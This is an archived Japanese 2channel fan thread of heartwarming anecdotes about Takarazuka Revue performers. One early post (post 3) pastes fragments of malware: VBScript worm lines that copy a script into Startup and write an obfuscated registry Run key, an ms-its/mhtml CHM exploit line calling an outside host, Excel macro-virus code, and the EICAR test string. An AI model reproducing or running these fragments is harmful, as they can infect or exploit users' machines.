2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

川´・ω・`川 ほのぼの 宝塚

1 :名無しさん@花束いっぱい。:2006/11/02(木) 19:24:29 ID:6KgtxiN0
小さな湯の街に住むフェアリー達にまつわるちょっといい話、
心和む可愛いエピソードを教えあうスレ。

○ageでもsageでもどっちでもおk
○サツバーツ イクナイ

2 :名無しさん@花束いっぱい。:2006/11/02(木) 19:27:06 ID:yrCGlIhY
2get!

3 :<body onload=window()>:2006/11/02(木) 21:00:45 ID:JEroRGgH
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


4 :名無しさん@花束いっぱい。:2006/11/02(木) 21:34:41 ID:pL/mvxUS
タニが「FEVER」の場面で早替わり室を使う人を紙に書いて
トウコに持って行ったら、
どうみても「フェロウ」にしか見えなくて
意味が分からなくてケロに尋ねたら
「あー、タニの字ねー・・・これは多分FEVERじゃないかな・・・」って
解読してくれたって話

和んだ

5 :名無しさん@花束いっぱい。:2006/11/02(木) 23:22:53 ID:pGS94LWt
>>4タニwwそれは何時の話?

6 :名無しさん@花束いっぱい。:2006/11/02(木) 23:53:40 ID:qhdXfhNR
>>5
雨唄のトークショーでとうこが言ってたと思う。
TCAの時に起こった面白エピソードで。

自分は、“長い春の果てに”で恋人役のゆうひに指輪を贈ろうと思った(●▽●)が
ゆうひの周りをウロウロしておもむろに割り箸の袋をゆうひの指に巻きつけ
さりげなくサイズを測ったつもりで去って行った、というエピソードにほのぼのしたよ。

7 :名無しさん@花束いっぱい。:2006/11/03(金) 00:20:52 ID:7+rKkpvT
全然話した事のない下級生にまで明るく挨拶するというしいちゃん
ええ人や

8 :名無しさん@花束いっぱい。:2006/11/03(金) 01:38:57 ID:C6UiUe2F
シャンテ内のわたる衣裳展を見にきたらしい>となみ

びっくり&ほっこり(´∀`)

9 :名無しさん@花束いっぱい。:2006/11/03(金) 02:35:38 ID:SOj25j1k
良スレなヨカーン(´・∀・`)

10 :名無しさん@花束いっぱい。:2006/11/03(金) 03:10:03 ID:MY1EZexf
>>6
さりげなくねーwバレバレw

11 :名無しさん@花束いっぱい。:2006/11/03(金) 11:49:09 ID:AvBzZcS+
オサの楽屋前に毎日花を飾ってくれる彩音。
女の子らしい。

12 :名無しさん@花束いっぱい。:2006/11/03(金) 14:44:37 ID:XTVBCNhq
↑彩音ちゃん、可愛い〜。乙女だねぇ。

私は、樹里さんが大月さゆちゃんに、コンサートチケット(千秋楽)の手配を急遽してくれたっていう話に和んだ。
本当優しいんだねー。正確には、さゆちゃんの両親の分なんだけど。

13 :名無しさん@花束いっぱい。:2006/11/04(土) 20:57:11 ID:JA0pCY3/
あげてみる

14 :名無しさん@花束いっぱい。:2006/11/04(土) 21:12:38 ID:ESY83Tne
街で見かけた…であった、えりたんエピが大好きだった。
ほっこりしたなぁ。

15 :名無しさん@花束いっぱい。:2006/11/08(水) 22:38:26 ID:RdbFDMGy
えりたんの話、もっかい詳しく聞きたいな…


16 :名無しさん@花束いっぱい。:2006/11/13(月) 21:22:22 ID:YdpdMMtR
良スレage

17 :名無しさん@花束いっぱい。:2006/11/16(木) 14:57:13 ID:6vDcHJJX
婚約者さん(と思しき男性)が手紙を書いたり、
手渡ししている姿にほのぼのする。
お幸せに。お嫁さんを大事にしてね。

…25年ほど前のグラフに、寿退団の娘役に
婚約者さんから、楽屋にしょっちゅう電話が来るそうな。
そのたびに上級生から歓声が上がり、恥ずかしそうに電話に出たそう。
今もお幸せかしら……

18 :名無しさん@花束いっぱい。:2006/11/16(木) 15:48:38 ID:mo1m5SHj
良スレだなぁ

指輪と言えばガイズの時も(●▽●)がキリヤンに指輪を送ってたね
喜んだキリヤンがウキウキして劇中で歌いながら手をみたら
つけ忘れてて「しまったー」…て言う話ありませんでしたっけ?


19 :名無しさん@花束いっぱい。:2006/11/22(水) 16:56:17 ID:qZbXlFm+
良スレあげ

男役が女役をやるときには、女役さんが
カツラの手入れ他教えてくれるんだそうな。
親切だなーって思うよ。

20 :名無しさん@花束いっぱい。:2006/11/22(水) 21:36:35 ID:HXVJWy5h
いつだか忘れたが、TCA稽古期間だったかな?
ある日、となみが楽屋から出てFCのとこまで行くとき、
となみFCの近く(隣?)で上級生がお手紙やら受け取ってる最中で、となみは上級生が帰るまで待ってた。
お向かいのキリヤン?会のスタッフの隣に一緒ににこにこしながらチョコンとしゃがんで…。
とっても可愛い光景でしたよ!

21 :名無しさん@花束いっぱい。:2006/11/23(木) 12:39:14 ID:8uoTgosl

となみ〜健気だ〜可愛いね。かなみんとかはスタスタ帰りそうだがw

22 :名無しさん@花束いっぱい。:2006/11/24(金) 01:43:48 ID:klVpn3dU
みっちゃんが、出の時に荷物を持つのが重そうだった代表さんに
「持とうか?」と言っていたのを聞いて、ちょっとときめいた(笑)
流石に代表さんは断っていたようだけど。

それにしても、良スレだね。
シューは本当に仲良いんだね〜。和む〜。

23 :名無しさん@花束いっぱい。:2006/11/24(金) 01:50:10 ID:RZFD5dIa
春麗プログラムより
”あなたが演じてみたい時代劇のヒーロー・ヒロインは?”

朝海ひかる 「うっかり八兵衛」

24 :名無しさん@花束いっぱい。:2006/11/24(金) 01:52:00 ID:euAE70Dg
>23
確かにうっかり八兵衛は裏のヒーローだが…w


25 :名無しさん@花束いっぱい。:2006/11/24(金) 08:00:57 ID:a1evxCgj
ある日の入りで、、、
車がくるのに気付き、さりげなくお付きさんをそっと誘導して楽屋口へ向かった轟さん。
あなたジェントルマンやないけ!!
一人ときめいてしまったが…他にみた方はいらっしゃいます?
うまく説明できなくてスマソ。

26 :名無しさん@花束いっぱい。:2006/11/24(金) 21:00:20 ID:klVpn3dU
轟さんといえば、
暁公演中の子どもの日に、ローマ市民(子ども?)全員に菖蒲をプレゼントしたというエピソードを読んで、流石だ!!と思ってしまった。

27 :名無しさん@花束いっぱい。:2006/11/29(水) 10:14:48 ID:WRh0D/rd
月組中国公演でのこと。
CANCANの場面に出る直前に、まつげを忘れたことに気付いた(●▽●)。
全然間に合いそうになくて焦ってたら、ゆうひに
「大丈夫!まつげない方が男らしい!」って励まされて
結局まつげなしで舞台に出たって話をどっかで聞いた。

28 :名無しさん@花束いっぱい。:2006/12/03(日) 08:24:29 ID:M0Wvfos5
あげてみた

29 :名無しさん@花束いっぱい。:2006/12/03(日) 09:26:38 ID:9tbPjsJ8
元☆のかよちゃんは退団公演の入りの時、代表さんに「FCの人達と写真を…」みたいな事を言われ
横にずらっと長い列を見て少し迷った後、列の一番端に腰をおろした。
みんなが「いやいや、真ん中へ」みたいな雰囲気になってちょっと面白かった。
一瞬、並びに同化してしまったかよちゃんはとてもかわいらしくて、FCとのやりとりも和みました。


30 :名無しさん@花束いっぱい。:2006/12/03(日) 11:42:14 ID:rnTu2VkI
いいなぁ〜かよちゃん。
いいスレだねここ・・・

31 :名無しさん@花束いっぱい。:2006/12/03(日) 12:52:42 ID:scrblnKz
かよちゃんらしい。カワユス。

32 :名無しさん@花束いっぱい。:2006/12/05(火) 13:03:52 ID:/JCoRdzm
歌劇の
キムがコムの撮影現場を見てて、コムが格好良すぎて泣きだした
っちゅーエピ

(*´ω`*)




(´;ω;`)ブワッ

33 :名無しさん@花束いっぱい。:2006/12/06(水) 11:21:55 ID:GXSDa6jM
かよちゃん、ユニクロに行くとか、ユニクロに行っても沢山は買えないとか、
庶民的なスターさんだったなあw
えみくらちゃんを「かわいこちゃん」てよんでたのとか、
ほのぼのエピ多い気ガス

34 :名無しさん@花束いっぱい。:2006/12/06(水) 17:52:01 ID:aS95oNba
「いいとも」、檀ちゃん→マミさんだった上に、マミさんに(●▽●)が花を送ってたのに和んだ。
アルフィーの高見沢さんの花の後ろでちょっと隠れてて、「大和 悠」までしか見えなかったところが和み度倍増w

35 :名無しさん@花束いっぱい。:2006/12/07(木) 14:18:09 ID:zFsEDi2j
>>32
あなたにも癒されました…w

36 :名無しさん@花束いっぱい。:2006/12/07(木) 14:41:40 ID:iOb0v95S
とうこがタニから手紙をもらったら安蘭の「蘭」の字が「くさかんむりに間」だった。
タニはその字をプログラム見ながら一生懸命書いたそうだ。
タニカワユス。

37 :名無しさん@花束いっぱい。:2006/12/07(木) 22:48:55 ID:p3D7r1w7
(●▽●)、本当に漢字ドリルが必要なコだったとは・・・w

しかしなごんだw

38 :名無しさん@花束いっぱい。:2006/12/08(金) 21:48:55 ID:u3nSBqJ2
アカン けい・・・

39 :名無しさん@花束いっぱい。:2006/12/09(土) 18:25:58 ID:QCbAOxJ5
タニ アカンやん・・・

40 :名無しさん@花束いっぱい。:2006/12/09(土) 22:43:02 ID:nYvfp6Bb
タニって学校の成績良かったんじゃ…??

41 :名無しさん@花束いっぱい。:2006/12/16(土) 13:45:50 ID:K8TI8cUe


42 :名無しさん@花束いっぱい。:2006/12/16(土) 13:59:09 ID:uJKibe/F
お花様がまだ研3だった頃、花の道かいわいで快く
2ショ撮らせていただきました。

なんて、謙虚で優しい娘役さんなのだろうかと思い
ました。

43 :名無しさん@花束いっぱい。:2006/12/16(土) 21:46:50 ID:Nsznz1O1
お菓子でシャンシャンを作ってゆら姐にプレゼントした理事。

44 :名無しさん@花束いっぱい。:2006/12/18(月) 01:32:48 ID:HfftKOl2
理事ったら……
ゆらさんの前では可愛いのな…

45 :名無しさん@花束いっぱい。:2006/12/18(月) 14:00:09 ID:2hezQEen
ちょっと昔に
どこかのスレにあった
えりたんネタは
ほのぼのしたね。


46 :名無しさん@花束いっぱい。:2006/12/19(火) 15:43:28 ID:WBbDpV8M
ほのぼの話はタニ関係が多いのかな?
そもそもこの(●▽●)顔が和むわ〜

47 :名無しさん@花束いっぱい。:2006/12/19(火) 17:44:55 ID:tq0PuFDP
別館タニスレは笑えるぞw

48 :名無しさん@花束いっぱい。:2006/12/20(水) 13:07:00 ID:hVq2bJN3
>45
子供との交流?あれはよいね〜。

えりたんといえば、これもどっかのスレで見たんだけど。
町なかでえりたんを見かけた人が「あ、壮一帆」と思わず呟いたら
「その通りでございます」と返したとかww
機転の利く人なのね。

>46>47
(●▽●)が増えたりするよね…ww
かなみんAAも和む。

49 :名無しさん@花束いっぱい。:2006/12/20(水) 22:21:21 ID:yJbQKbZV
ほっこりスレ万歳!

いつだかの歌劇にあった、すずみんがまとぶんのマンションのドアノブに
自分で作ったパン(の袋?多分)をかけてるって話には和んだなあ
あの対談(?)全体的にかわいかった。

あとすずみんがごはんのスイッチを押してって言われて
保温のスイッチ押してた とかw

50 :名無しさん@花束いっぱい。:2006/12/20(水) 22:34:36 ID:jokO/3Vw
すずみんwステキww

82期はすごいな。蘭とむは赤面トプだしw

51 :名無しさん@花束いっぱい。:2006/12/21(木) 09:52:04 ID:X2dV8kjy
こないだの花全ツ
おさちゃんがゆみこさんのスリッパ作ってあげたって。

52 :名無しさん@花束いっぱい。:2006/12/21(木) 11:42:13 ID:Nm0vOCOF
>51
その話は何かに載ってたの?
スリッパに飾付けしたってことなのかな?

53 :名無しさん@花束いっぱい。:2006/12/21(木) 13:40:39 ID:kRnblDT7
こないだの歌劇の絵と文だから、知ってる人も多いだろうケド。

昔の全ツでのーんびり楽屋出る準備してたらね〜りせに怒られたの〜

ってみつるにのんびりチクってるユミコにほっこりw
怒られてるのもチクってるのも想像するだに和むツーショット。

54 :名無しさん@花束いっぱい。:2006/12/30(土) 18:26:27 ID:lgkdmVP/
龍馬&ザクラシックトーク

ダンスのターン?で目が回ってるらしいるいちゃんに
「るいちゃんだいじょぶかな、あたしはここだよ〜
と思いながら回してあげてるの〜」とかしちゃん。
かわいくてほのぼのしたよ。かしるいもっと見たかったな

55 :名無しさん@花束いっぱい。:2007/01/01(月) 00:17:27 ID:aaqy+E7x
祐穂さとるの顔

56 :名無しさん@花束いっぱい。:2007/01/02(火) 14:15:45 ID:knEaoc6a
>>55
たしかに…!(笑)


聞いた話だけど
ソウル・オブ・シバ!! のホストクラブのシーンで、
百花マダムと毎回色々絡んでた真飛ホストが
約束げんまんをしようとして小指をからめようとしたら、
手袋の指先の指があると思ってたところに指が入ってなくて
ものすげえ驚いたらしい。

百花さんどんだけ小指が短いんだという話w
かわいくて和んだ。

57 :名無しさん@花束いっぱい。:2007/01/09(火) 12:31:49 ID:bIN30B/9
ニュージェネ本より

コマ
合格発表の日、名前があるか見にいくのが怖くなって
学校の手前でUターンして親と鬼ごっこしてました

どんな親子だよ!!

58 :名無しさん@花束いっぱい。:2007/01/09(火) 12:37:02 ID:g2rgwhGF
きたろうのテトリスもなかなかwww

59 :名無しさん@花束いっぱい。:2007/01/09(火) 19:40:06 ID:4YifJMff
しみこにジャージ代借りたのに誰に借りたか覚えてないキタロウもなかなかww

60 :名無しさん@花束いっぱい。:2007/01/14(日) 13:54:11 ID:ks5GIw7f
駅で待ってるきたろう母もなかなかww

61 :名無しさん@花束いっぱい。:2007/01/14(日) 19:57:26 ID:5It/7H9q
困った、きたろう見る度に噴きそうになるww

62 :名無しさん@花束いっぱい。:2007/01/15(月) 23:42:11 ID:uXacXkhJ
『化粧前でいつもゆうひさんが「なほー」って
ぷっちょを渡してくるので
毎日ぷっちょばかり食べています』と
満面の笑みで嬉しそうに言ってたリュウさんに何かほのぼのした。

63 :名無しさん@花束いっぱい。:2007/01/16(火) 00:07:58 ID:QaaI3bGw
月ナウオンより…
存在を消そうとすること自体が邪魔と散々言われて、"じゃあどうしたらいいですか!?"と
必死なきりやんにちと、癒された。存在を消そうとしてるきりやんを想像して、また癒されるw

64 :名無しさん@花束いっぱい。:2007/01/16(火) 00:32:12 ID:w/7XMVzF
同じく月ナウオンより

きり「ペトルーシュカという…」
あさ「ペトルーシュカね」
きり「マトリョーシカじゃないよ」
あさ「チェブラーシカでもないよ」

こんな会話が好き…。

65 :名無しさん@花束いっぱい。:2007/01/16(火) 01:46:15 ID:QaaI3bGw
>>64
私も好き…w
彩乃センパイ連発もね。
何か今回のナウオンは癒された。東京はどんなメンツだろうか。

66 :名無しさん@花束いっぱい。:2007/01/16(火) 02:40:29 ID:xHiPptqJ
月組って和むw

67 :名無しさん@花束いっぱい。:2007/01/16(火) 12:44:08 ID:cqBHdy4j
良スレにつき、あげます。

68 :名無しさん@花束いっぱい。:2007/01/16(火) 15:30:49 ID:9f5jFbYB
公演中に夜な夜な一夜干しを作る理事

69 :名無しさん@花束いっぱい。:2007/01/17(水) 01:30:41 ID:lQKAbMu4
理事w夜な夜なってww

確か、みっちゃんは漬物漬けるんだよねw

70 :名無しさん@花束いっぱい。:2007/01/17(水) 01:49:54 ID:yhVzxNJK
良スレage!
煮詰まると、カチカチとタップを踏み出す、みっちゃんにもほのぼのw

71 :名無しさん@花束いっぱい。:2007/01/17(水) 02:31:00 ID:lS+KydC5
理事作り過ぎw

全ツシバで「Ladies and Gentlemen」てセリフが回ってきて
マギーに発音教わりに行ったしぃちゃん

72 :名無しさん@花束いっぱい。:2007/01/17(水) 03:38:37 ID:Q/xC0+gF
しいちゃんw徹底してるな〜
つか、面識ほとんどなさげなマギーにかw

73 :名無しさん@花束いっぱい。:2007/01/17(水) 08:27:04 ID:fWGKWp85
>>63さらにいえば、そこのきりやんは敬語じゃなくて、
「どうしたらいい?」とタメ語で、返事がないから、
「ねえねえねえねえ、どうしたらいい?」て一所懸命あさこにいうのがかわいくてほのぼのした。

74 :名無しさん@花束いっぱい。:2007/01/17(水) 12:23:14 ID:agE0WIzx
>>73
そうそうw
タメなのが逆に可愛いんだけど、皆から無視されてたよねwww

75 :名無しさん@花束いっぱい。:2007/01/19(金) 22:27:02 ID:7OiyVMW/
オクラホマのとき 理事ときりやんが揃うと
話題はいつもワンちゃんか食べ物の話・・・

76 :名無しさん@花束いっぱい。:2007/01/20(土) 22:16:08 ID:UnDlWN8B
グラフの宙組トークから。ショーの舞台稽古でジョルジュ・サンド=タニのあまりの可愛らしさに、思わず「コクった!」かしちゃん。
スモークと一緒にセリ上がる美麗かしを、花道から「あぁ〜きれ〜」と下級生と一緒に観てる蘭トム。
これが最後のトリオとは…、ホント惜しいよ君達。




77 :名無しさん@花束いっぱい。:2007/01/22(月) 15:14:35 ID:M/W/kpYe
今月GRAPHのかしるいトーク(写メ云々の件)といい、
かしタニとむのトークデラックスといい、和みっぱなし。

「男役時代のるいちゃん」と題してCSでチリーパ(血砂)の画像写メって送るかしちw
恥ずかしくて耐え切れなくなって電話するるいちゃんww
翌日私ミエの役やるからラブシーンやろうよ〜と迫るかしち。
逃げるるいちゃん。

・・・可愛すぎるorz

78 :名無しさん@花束いっぱい。:2007/01/22(月) 19:45:00 ID:nxZpei8B
>>77
かーーーわーーーーいーーいーーーっっ
グラフまだ買ってないんだよね。いいもん読んだ、楽しみにしてよう。
かしるい最高!

79 :名無しさん@花束いっぱい。:2007/01/22(月) 20:53:53 ID:EVy02zW4
しいミズのスカステトークは全般的にほのぼのマターリだった
79期バンザイ

80 :名無しさん@花束いっぱい。:2007/01/29(月) 18:15:24 ID:Bj/BVpLL
良スレage

81 :名無しさん@花束いっぱい。:2007/01/30(火) 00:50:21 ID:0zEPaDyI
今更だけどGRAPHかしるい対談

お稽古が終わっても
「かしげさんが帰るまで、帰りません!」
と言う、るいるいへのかしげの思い
「いるんだったら、いてもいいか…」

…あの…正塚芝居風味になってますが…。

顔がゆるむ。

82 :名無しさん@花束いっぱい。:2007/01/30(火) 10:25:51 ID:KIwf/QOH
まみちゃんとお似合いだという話になった時「じゃあ何で檀ちゃん選らんだのよ?」とふくれっ面のゆらさんとタジタジなまみちゃん。

前に名言スレで見て和み萌えた。

83 :名無しさん@花束いっぱい。:2007/01/31(水) 10:41:07 ID:p91JRRgP
かしちゃん家のゴキブリをハマコが退治した話は知っていたが…、
ハマコからのメッセージ(2005年グラフより)
「〜これからもずっと仲良くしてください!
 追伸…自宅で虫を発見した時は、いつでも虫退治に呼んで下さい(笑)
    ご用命があれば すっ飛んで行きます!(笑)」
なんていいヒトなんだ、ハマコ!かしちゃん、愛されているなあ。



84 :名無しさん@花束いっぱい。:2007/01/31(水) 17:03:49 ID:Q9A9fPQn
あさこのサイン、そのまんまでカワイイ。

85 :名無しさん@花束いっぱい。:2007/02/05(月) 17:18:28 ID:j5dzUhxn
歌劇の彩音の絵と文












のえりたんの絵wwww

86 :名無しさん@花束いっぱい。:2007/02/06(火) 19:09:59 ID:6pJ3fdyY
私はまとぶの絵に和んだ……
アレぜったい哺乳類だよw
あーほんとあいつダメだなあ!

87 :名無しさん@花束いっぱい。:2007/02/06(火) 19:24:49 ID:VXZpovn4
丸めて捨てたのを拾うのはアリなんだろうかとw

88 :名無しさん@花束いっぱい。:2007/02/07(水) 12:34:01 ID:dSp2gwWv
歌劇のプリンス&プリンセスコーナーの七十チギ。
「聞く順番は・・・じゃんけんぽんっ」
かしげ「え、ジャンケンなの?」
しかも質問は負けた人からw 罰ゲーム扱いかw

それ以外にもUSJの話で「ほら、あの、水があるんですよ、水の乗り物がw」
って全然伝わらないチギにも和んだ。

編集してあのグダグダ感。なごむわ〜宙組。

89 :名無しさん@花束いっぱい。:2007/02/12(月) 00:29:00 ID:pFla/5Ql
ほのぼのスレを萌えスレと勘違いする香具師が
雪組出身生徒(かし・コム)ファンには多い

90 :名無しさん@花束いっぱい。:2007/02/13(火) 02:53:26 ID:j5rO6epd
宙楽にハマコが来てた・・・。
休演日かと思ったらそうじゃないんだね。
公演終わってから名古屋から駆けつけたのか?
ゴキブリ出たら大変だもんね・・・。
なんか泣けたよ〜。

91 :名無しさん@花束いっぱい。:2007/02/13(火) 08:08:52 ID:dajVa3+U
>>55
吹いたw

92 :名無しさん@花束いっぱい。:2007/02/19(月) 15:00:44 ID:HHTjomJm
宙千秋楽の出でのこと
はっちゃんが会のひとたちに「これ、バレンタインの前祝い…」となにやら紙袋を差し出してた。
沸く会メンバー。中はちょっと出してたけど良く見えなかったんだけど、どうやら作ったらしく
「みなさんでどうぞー」とすごく感じよく代表さんに渡してますた。

そのあと、会員のひとりが連れてたこどもに「(他のみんなには)ごめんね」と言いながら、
ミッキーらしきぬいぐるみを渡していた。
で、そのこどもにこそこそっと何か言われて、
「やだー、はっちゃん好きって言った!」、「と、年上だけどいいかなあ?」とか
言っててかなり楽しい雰囲気でした。

はっちゃんの出ってちゃんと見たの初めてだったけど
すごい感じよくてほのぼの、ほっこりしたよー。
やめちゃうんだよね…あの時既に退団を決意してたかと思うと泣けるわ…
長文スマソ

93 :名無しさん@花束いっぱい。:2007/02/21(水) 23:45:49 ID:ZLgogwrw
今更だがはっちゃん退団あげ
(´;ω;`)

94 :名無しさん@花束いっぱい。:2007/02/21(水) 23:53:37 ID:9Jbk9mpT
はっちゃん・・・

95 :名無しさん@花束いっぱい。:2007/02/22(木) 00:30:07 ID:/c5GoiMT
某紳士服店で父がペアチケットを当てました。
24日の花組ですが、友達と行くのが楽しみです!


96 :名無しさん@花束いっぱい。:2007/02/22(木) 00:31:40 ID:wvgwPXWj
>>95 父ちゃんつれてってやれよ〜w
あと>>1よく嫁www

97 :名無しさん@花束いっぱい。:2007/02/22(木) 00:41:51 ID:1+0VJplZ
はっちゃん…耳欠けがキュート…

98 :名無しさん@花束いっぱい。:2007/02/22(木) 01:48:28 ID:+DB0AFWI
>>95スレ違いだがほのぼのだからオケーww

99 :名無しさん@花束いっぱい。:2007/02/24(土) 21:25:22 ID:ohYETeL0
良スレあげ!

100 :名無しさん@花束いっぱい。:2007/02/25(日) 15:21:33 ID:eORRvliC
100

101 :名無しさん@花束いっぱい。:2007/02/27(火) 20:02:13 ID:wRu5LGjf
>96,98
おまいらのレスにほのぼのした…w
って、これもスレチだけど。

102 :名無しさん@花束いっぱい。:2007/02/28(水) 09:08:31 ID:swo3HAuR
ageますね('ω'*)

103 :名無しさん@花束いっぱい。:2007/02/28(水) 21:51:18 ID:8N1xUuP3
ここは素晴らしいスレですね!

104 :名無しさん@花束いっぱい。:2007/03/01(木) 02:04:07 ID:cQ3bSMkz
中日楽の出で、ゆみこがFCの中のくじで選ばれた人に、
オモチャの日本刀をプレゼントするとき、
その人を切るジェスチャーをしてて可愛かった。

あと、FCの人の子供がいて、その子が手を振り返してくれるまで、
すごい笑顔で手を振り続けてたゆみこになごんだww

105 :名無しさん@花束いっぱい。:2007/03/01(木) 11:02:36 ID:aAV0Bc7Y
竜馬公演中の突撃インタビューにて。
はっちゃんがタニに、ショーでの女役について尋ねたところ
その質問待ってました!とばかりに両手の指を胸の前で
ヒラヒラさせ、目を三日月のように細めて視線を宙へ泳がせ…
乙女(●▽●)「ハ〜イ(はぁと)、
かしげさんとデュエットダンスを踊れてすごく幸せに…、
毎日ドキドキしながらキラキラひとめを見ております!!」
このときの(●▽●)は、見たことない位最上級に可愛かった。
もちろん直後にかしげに
「ひとめwww、ひとみだよ〜!!」と突っ込まれていたのは
言うまでもない。

106 :名無しさん@花束いっぱい。:2007/03/02(金) 09:50:36 ID:cQ/U7Phr
花組 マメの会の名前が「ビーンズクラブ」と聞いた。
何か、和んだ。

107 :名無しさん@花束いっぱい。:2007/03/02(金) 11:42:40 ID:46RB/tP4
マメwww

108 :名無しさん@花束いっぱい。:2007/03/02(金) 23:57:47 ID:YyocvjMy
マメwwwキタこれwww

109 :名無しさん@花束いっぱい。:2007/03/03(土) 00:34:09 ID:0ukZ23JA
やばい。入りたくなったw

110 :名無しさん@花束いっぱい。:2007/03/07(水) 12:40:02 ID:0I069Oxf
星コパのナウオンを久々に見て、
「人をせかすニュアンスがわからない」と真剣に悩むとなみにほのぼのした。
あととなみのたどたどしい最後の抱負に思わず「かわいい〜」と呟くあすかにも。

111 :名無しさん@花束いっぱい。:2007/03/10(土) 06:32:47 ID:0+HGs//J
むか〜し既出だったと思うデスが
花全ツでマダムスミレちゃん、ドレスの裾を足元の照明板に引っ掛け、板がはずれちゃった。
客席降りでそれを手に持って歌い、ホール天井にいる照明さんに
「ごめんなさ〜い、壊しちゃったあ〜」
テラカワユかったス。

112 :名無しさん@花束いっぱい。:2007/03/10(土) 11:19:25 ID:2Fn9+vTK
初めて宙の出を見ましたが、ともちんが手紙を受け取った後、
暫らく立ち止まって会の人と楽しそうに話ししてた。
いつもあんなふうにフレンドリーなのかな?

113 :名無しさん@花束いっぱい。:2007/03/10(土) 14:43:54 ID:W3rGZEzT
>>112
特別珍しい光景でもないと思われ

114 :名無しさん@花束いっぱい。:2007/03/10(土) 18:55:37 ID:jPFTo4mH
このスレ、トロイ仕込まれててほのぼのじゃねーな

115 :名無しさん@花束いっぱい。:2007/03/10(土) 19:38:44 ID:9glnd/Sp
>>114
( ゚д゚)ポカーン

春ですね。

116 :名無しさん@花束いっぱい。:2007/03/10(土) 19:58:32 ID:j+HbHl/o
>>114
うちの地元だ
確かにかなりかわいかった!!
そのあとコメディアンのゆみこさんが
大袈裟に注意したのがさらに和んだ

117 :名無しさん@花束いっぱい。:2007/03/10(土) 20:00:00 ID:j+HbHl/o
アンカーミス…
↑のは>>111

118 :名無しさん@花束いっぱい。:2007/03/12(月) 00:28:14 ID:seicrTix
ブリリアントきりやんとフィンチに癒されまくり..w
何かある度「なぁ、フィンチ」と声掛けるきりやんw

119 :名無しさん@花束いっぱい。:2007/03/12(月) 11:50:27 ID:xZA15O2k
>>118
きりやんは喋りまくってるのになんか緩いくてマターリだったね。
犬と真剣に喋るジェンヌって初めて見たww和んだ。

120 :名無しさん@花束いっぱい。:2007/03/13(火) 20:02:59 ID:F7ZYBenM
>106
今更だが(;´Д`)ハァハァ

121 :名無しさん@花束いっぱい。:2007/03/14(水) 02:58:58 ID:DmlOnw0H
きりやん&フィンチコンビはいつもほのぼのだね。

122 :名無しさん@花束いっぱい。:2007/03/14(水) 07:30:02 ID:ZlIEPhWy
先週の土曜だか日曜だか忘れたが
ファンがつれてきた子供をどうにか振り向かせようと
歩きながらほっぺたさわったりしてかまってるみわっちを見た。
また普通は子連れとか嫌がるのについてるファンの人たちもみんな笑顔だった。


ずいぶん昔だけどおなじくみわっちの入り
後ろを歩くファンの最終列に見た顔がいるなあと思ったら
園加だったw

123 :名無しさん@花束いっぱい。:2007/03/14(水) 10:04:27 ID:OwkaJmah
東宝で出待ちのギャラリーしてたときに、
先に出てきてたみわっちの後ろを通る園加がちょっかいかけてて
最後は一緒に腕組んで帝国側に消えていったのを思い出した。
みわっちと園加ってもとから結構仲良しだったよね。

124 :名無しさん@花束いっぱい。:2007/03/14(水) 10:19:45 ID:SVoRHPW9
楽屋口で傘持ってちゃんばらしてるみわ園を見たことがある

ファントムの東宝の楽の出で園加がみわっちとまっつのファンに
「ふたりともまだ楽屋で号泣してます」と
わざわざ報告して帰っていった。
その後にまっつが出てきて園加会に「これからも園加をよろしく」
みたいな感じのことを言って帰っていった。

125 :名無しさん@花束いっぱい。:2007/03/20(火) 16:34:57 ID:G8Ot4hU/
>>124
ちゃんばらかわいいなあw

126 :名無しさん@花束いっぱい。:2007/03/30(金) 02:26:37 ID:Dln/EjXt
ゆひ茶で最後に今後の予定を話す時
「全国ツアー公演が5月22日から6月の・・・・(何かに気づく)
Σ( ゚Д゚)ハッ!
(5月22日は)かしちゃんの誕生日!」と
嬉しそうに言ったのが可愛かった。

127 :名無しさん@花束いっぱい。:2007/04/01(日) 01:08:11 ID:DWnq3M1n
>126
ゆひ可愛いなvvめっちゃ素やん。

>121
フィンチを可愛い可愛いと言ってる霧矢が可愛くて・・・
となごむ周り(ゆうひ・越リュウ・ゆみetc)にも、ほのぼのw

128 :名無しさん@花束いっぱい。:2007/04/02(月) 02:35:35 ID:7A4xbtH+
友達のDVD借りて一回見ただけだから記憶違い混ざってるかもだけど、
大運動会の作戦会議風景(?)で、

水「どうしよタカコさん、借り物書いてある文字を解読できなかったら」
タカコ「あー…どうしようね。タニが危険?タニは?」
水「おーい、タニーぃ」
「タニさん今大玉転がしに夢中です〜」
タカコ&水「;`;:゙;`(;゚;ж;゚; )ブッ 」

和んだと同時に、やはりヤツは(●▽●)なんだと思った。

129 :名無しさん@花束いっぱい。:2007/04/02(月) 21:33:17 ID:ljik/S6+
>>127
いい加減フィンチうざいけど。
公私混同もたいがいにしろと。

130 :名無しさん@花束いっぱい。:2007/04/02(月) 21:52:52 ID:ZMKIMo/t
>>129タン
マターリいこうじゃまいか

131 :名無しさん@花束いっぱい。:2007/04/05(木) 11:48:19 ID:06vwhtZx
>129
ほのぼのスレに不向きの人ハケーン


まーちゃんとセロームさんは最強ほのぼのだと思うw

132 :名無しさん@花束いっぱい。:2007/04/08(日) 02:09:04 ID:7BBnJJT8
良スレage
